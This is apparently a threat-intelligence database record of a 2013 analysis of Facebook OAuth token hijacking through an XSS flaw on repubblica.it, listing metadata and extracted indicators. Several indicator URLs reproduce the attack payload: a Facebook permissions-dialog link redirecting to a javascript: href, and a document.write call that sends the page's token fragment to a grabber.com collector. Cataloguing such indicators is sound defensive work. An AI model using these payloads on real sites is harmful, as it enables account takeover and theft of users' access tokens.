Facebook OAuth token hijacking via repubblica.it XSS
Tags
| attack-pattern: | Data Javascript - T1059.007 |
Common Information
| Type | Value |
|---|---|
| UUID | fd0d42ae-8ca6-4c38-a7c6-045834c7d567 |
| Fingerprint | 5e21574c3fea9b34 |
| Analysis status | DONE |
| Considered CTI value | 0 |
| Text language | |
| Published | July 17, 2013, midnight |
| Added to db | Jan. 18, 2023, 7:48 p.m. |
| Last updated | Oct. 29, 2024, 2:46 a.m. |
| Headline | Dissecting |
| Title | Facebook OAuth token hijacking via repubblica.it XSS |
| Detected Hints/Tags/Attributes | 15/1/16 |
Source URLs
URL Provider
Attributes
| Details | Type | #Events | CTI | Value |
|---|---|---|---|---|
| Details | Domain | 2 | repubblica.it |
|
| Details | Domain | 1 | www.repubblica.it |
|
| Details | Domain | 1 | grabber.com |
|
| Details | Domain | 10 | graph.facebook.com |
|
| Details | File | 1 | interstitial.html |
|
| Details | File | 3 | token.php |
|
| Details | File | 1 | 'fbout.txt |
|
| Details | File | 1 | 094653287-01e6777c-9cdb-46f1-b7c5-694920034ad8.jpg |
|
| Details | Url | 1 | http://www.repubblica.it/static/includes/common/interstitial.html?href=javascript:alert |
|
| Details | Url | 1 | https://www.facebook.com/dialog/permissions.request?app_id=182234715127717&display=page&next=&response_type=token&fbconnect=1#sthash.q5jxmpqn.dpuf |
|
| Details | Url | 1 | https://www.facebook.com/dialog/permissions.request?app_id=182234715127717&display=page&next=http://www.repubblica.it/static/includes/common/interstitial.html?href=javascript:alert(window.location.hash);&response_type=token&fbconnect=1#sthash.q5jxmpqn.dpuf |
|
| Details | Url | 1 | http://grabber.com/token.php?",window.location.hash.replace(string.fromcharcode(35),''),"'/>"].join |
|
| Details | Url | 1 | https://graph.facebook.com/me/feed |
|
| Details | Url | 1 | https://www.facebook.com/dialog/permissions.request?app_id=182234715127717&display=page&next=http://www.repubblica.it/static/includes/common/interstitial.html?href=javascript:document.write |
|
| Details | Url | 1 | http://grabber.com/token.php?",window.location.hash.replace(string.fromcharcode(35),""),"\'/>"].join(\'\'));&response_type=token&fbconnect=1#sthash.q5jxmpqn.dpuf |
|
| Details | Url | 1 | http://www.repubblica.it/images/2013/03/13/094653287-01e6777c-9cdb-46f1-b7c5-694920034ad8.jpg |